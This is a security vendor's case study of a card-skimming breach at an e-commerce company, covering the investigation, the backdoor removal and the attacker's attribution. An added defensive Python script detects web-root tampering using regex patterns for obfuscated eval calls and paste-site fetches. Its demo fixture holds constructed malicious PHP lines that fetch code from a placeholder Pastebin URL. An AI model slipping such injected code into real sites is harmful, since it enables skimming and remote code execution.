CASE STUDY

Cyber Diligence: Critical for M&A

Apr 7, 2020 | Case Study, TPRM Exposure

The Challenge

A private equity company (the client) focusing on mid-size businesses acquired an e-commerce platform (the portfolio company), and during the post-acquisition period learned of a breach affecting the company’s public-facing application server. An attacker had gained unauthorized access to the underlying operating system, installed malicious code, and was skimming the credit card information of customers performing legitimate transactions.

Why Nisos

Unfortunately, the client had not integrated cybersecurity into its diligence process at the time of this acquisition. It had done so subsequently, and therefore understood that we would be able to bring extensive external data and expert analysis to investigate the nature of the breach and assist its portfolio company with remediation.

Preparation

The portfolio company received a notification from its credit card processor that it may have been compromised: over 700 credit cards that had been used legitimately on its site had later experienced fraud. The portfolio company identified one line of code that was silently skimming credit card payments and realized it could not handle detection, hunting, and remediation on its own. It ultimately notified the client. Nisos collected the available logs and deployed an endpoint detection and response (EDR) tool for active monitoring.

Execution

We were unable to determine the initial point of compromise, due to the length of time the attacker had access and the lack of prior log aggregation, but we did determine that the initial compromise occurred three months prior to our involvement.

Further investigative efforts indicated that the sophisticated attacker had gained root-level access to one of the portfolio company’s primary public-facing e-commerce web servers, as well as backend access to an API and database server, giving the attacker access to usernames, hashed passwords, email addresses, application content, and more.

Initially, the attacker modified the webpage, adding code that executed when customers purchased items and sent customer and credit card information to attacker-controlled infrastructure. We identified and removed the attacker’s persistent backdoor.

The attacker quickly realized they had been discovered and desperately tried to maintain persistent access by exploiting a logic flaw in legacy PHP code and downloading additional backdoors. We identified these backdoors using the EDR agent, reported the vulnerable PHP code, and removed all access despite repeated attempts to maintain persistence. During the course of our investigation, we discovered that the attacker had previously modified internal source code with a backdoor and posted it to Pastebin. The attacker leveraged Pastebin as a means of transferring malicious code to company servers.
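The two detection problems described above (a checkout page silently modified to skim card data, and backdoors re-downloaded from a paste site) are both caught by comparing the web root against a known-good manifest and scanning whatever changed. The following is an added example written for this page, not Nisos tooling or the portfolio company's code; the suspicious-pattern list and the constructed PHP snippets are assumptions for illustration.

```python
import hashlib
import re
from pathlib import Path

# Patterns a defender would flag in web-root code. Assumed for this example: the skimmer
# posts card data to a remote host and backdoors are pulled from a paste site, so remote
# fetches, paste-site references and obfuscated eval() calls are worth an alert.
SUSPICIOUS_PATTERNS = {
    "dynamic_eval": re.compile(r"\beval\s*\(\s*(?:base64_decode|gzinflate|str_rot13)", re.I),
    "paste_site": re.compile(r"pastebin\.com", re.I),
    "remote_fetch": re.compile(r"(?:file_get_contents|curl_init|fopen)\s*\(\s*['\"]https?://", re.I),
}


def snapshot(root):
    """Read every file under a web root into {relative posix path: bytes}."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): p.read_bytes() for p in root.rglob("*") if p.is_file()}


def hash_files(files):
    """Turn a snapshot into a known-good manifest of SHA-256 digests (store it off-host)."""
    return {path: hashlib.sha256(data).hexdigest() for path, data in files.items()}


def compare(baseline, current):
    """Report files added, removed, or modified relative to the baseline manifest."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
    }


def scan_text(text):
    """Return the names of suspicious patterns present in one file's contents."""
    return sorted(name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(text))


def audit(baseline, files):
    """Diff a fresh snapshot against the baseline and scan every new or changed file."""
    diff = compare(baseline, hash_files(files))
    findings = {}
    for path in diff["added"] + diff["modified"]:
        hits = scan_text(files[path].decode("utf-8", errors="replace"))
        if hits:
            findings[path] = hits
    return diff, findings


if __name__ == "__main__":
    # Constructed demo: a clean checkout page, then the same root after a skimmer injection.
    clean = {"checkout.php": b"<?php render_checkout(); ?>"}
    tampered = {
        "checkout.php": b"<?php render_checkout(); eval(base64_decode('Li4u')); ?>",
        "inc/cache.php": b"<?php $c = file_get_contents('https://pastebin.com/raw/PLACEHOLDER'); ?>",
    }
    print(audit(hash_files(clean), tampered))
```

In practice the baseline manifest is built from a trusted deployment artifact and kept off the web server, so an attacker with root cannot silently rewrite it alongside the page.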

Additional application testing uncovered several critical vulnerabilities that permitted administrative access to the applications. We made additional referrals to external application developers to aid with remediation.

Light attribution indicated the attacker used Tor and two additional VPN services to obfuscate their true location. A lapse in the VPN exposed the attacker’s true IP address, which Nisos tracked to an apartment complex in Eastern Europe. Additional analysis of NetFlow data revealed the attacker was targeting other, unrelated entities as well.

Impact

Over 700 customer credit cards were flagged with fraudulent charges, and this event caused significant damage to the brand reputation of the portfolio company. In hindsight, if proper diligence had been completed prior to the acquisition, the client would have known about the breach before closing the deal.

In the end, the client’s quick action upon notification of the credit card anomalies likely saved the business. Nisos experts were more than the presumably Eastern European attacker could handle, but not before the portfolio company suffered damage to its reputation and was forced to spend six figures remediating all of the damage the attacker had already done.

About Nisos

Nisos is the Managed Intelligence™ company. Our services enable security, intelligence, and trust and safety teams to leverage a world-class intelligence capability tailored to their needs. We fuse robust data collection with a deep understanding of the adversarial mindset delivering smarter defense and more effective response against advanced cyber attacks, disinformation, and abuse of digital platforms.

For additional information, contact info@nisos.com
